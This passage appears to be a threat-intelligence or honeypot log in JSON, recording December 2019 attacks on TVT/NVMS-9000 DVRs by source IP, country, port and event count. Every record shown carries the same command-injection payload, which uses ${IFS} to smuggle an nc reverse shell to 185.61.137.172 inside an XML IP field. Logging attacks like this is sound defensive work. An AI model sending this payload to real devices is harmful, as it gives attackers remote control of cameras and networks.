- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-19T02:57:15Z",
- "last_seen": "2019-12-19T02:57:15Z"
- },
- {
- "source_ip_address": "109.104.226.44",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-19T02:01:19Z",
- "last_seen": "2019-12-19T02:01:19Z"
- },
- {
- "source_ip_address": "111.185.51.218",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 7,
- "first_seen": "2019-12-19T01:51:36Z",
- "last_seen": "2019-12-19T01:51:36Z"
- },
- {
- "source_ip_address": "171.25.198.21",
- "country": "PL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-19T01:33:45Z",
- "last_seen": "2019-12-19T01:33:45Z"
- },
- {
- "source_ip_address": "98.119.140.65",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 103,
- "first_seen": "2019-12-19T01:33:20Z",
- "last_seen": "2019-12-19T01:33:20Z"
- },
- {
- "source_ip_address": "109.102.31.87",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-19T01:28:53Z",
- "last_seen": "2019-12-19T01:28:53Z"
- },
- {
- "source_ip_address": "70.104.137.168",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 104,
- "first_seen": "2019-12-19T00:57:09Z",
- "last_seen": "2019-12-19T00:57:09Z"
- },
- {
- "source_ip_address": "220.85.29.32",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 104,
- "first_seen": "2019-12-19T00:56:37Z",
- "last_seen": "2019-12-19T00:56:37Z"
- },
- {
- "source_ip_address": "187.137.54.78",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 104,
- "first_seen": "2019-12-19T00:24:47Z",
- "last_seen": "2019-12-19T00:24:47Z"
- },
- {
- "source_ip_address": "31.27.214.111",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-19T00:22:23Z",
- "last_seen": "2019-12-19T00:22:23Z"
- },
- {
- "source_ip_address": "78.139.27.208",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-19T00:22:04Z",
- "last_seen": "2019-12-19T00:22:04Z"
- },
- {
- "source_ip_address": "118.150.144.122",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T00:01:37Z",
- "last_seen": "2019-12-19T00:01:37Z"
- },
- {
- "source_ip_address": "213.235.188.22",
- "country": "CZ",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-18T23:51:30Z",
- "last_seen": "2019-12-18T23:51:30Z"
- },
- {
- "source_ip_address": "73.143.106.124",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-18T23:04:29Z",
- "last_seen": "2019-12-18T23:04:29Z"
- },
- {
- "source_ip_address": "216.252.208.240",
- "country": "CA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-18T22:48:17Z",
- "last_seen": "2019-12-18T22:48:17Z"
- },
- {
- "source_ip_address": "185.8.25.172",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-18T22:42:33Z",
- "last_seen": "2019-12-18T22:42:33Z"
- },
- {
- "source_ip_address": "88.209.219.144",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-18T22:02:14Z",
- "last_seen": "2019-12-18T22:02:14Z"
- },
- {
- "source_ip_address": "202.186.145.45",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-18T20:46:37Z",
- "last_seen": "2019-12-18T20:46:37Z"
- },
- {
- "source_ip_address": "119.160.148.175",
- "country": "BN",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-18T20:39:04Z",
- "last_seen": "2019-12-18T20:39:04Z"
- },
- {
- "source_ip_address": "210.202.105.4",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-18T19:59:02Z",
- "last_seen": "2019-12-18T19:59:02Z"
- },
- {
- "source_ip_address": "45.48.224.168",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-18T19:48:26Z",
- "last_seen": "2019-12-18T19:48:26Z"
- },
- {
- "source_ip_address": "71.251.9.186",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-18T19:44:28Z",
- "last_seen": "2019-12-18T19:44:28Z"
- },
- {
- "source_ip_address": "24.193.135.2",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-18T19:32:45Z",
- "last_seen": "2019-12-18T19:32:45Z"
- },
- {
- "source_ip_address": "72.27.220.115",
- "country": "JM",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-18T19:29:08Z",
- "last_seen": "2019-12-18T19:29:08Z"
- },
- {
- "source_ip_address": "220.134.157.241",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-18T19:23:10Z",
- "last_seen": "2019-12-18T19:23:10Z"
- },
- {
- "source_ip_address": "122.116.208.90",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-18T19:18:24Z",
- "last_seen": "2019-12-18T19:18:24Z"
- },
- {
- "source_ip_address": "134.56.157.127",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-18T19:02:31Z",
- "last_seen": "2019-12-18T19:02:31Z"
- },
- {
- "source_ip_address": "85.105.188.127",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
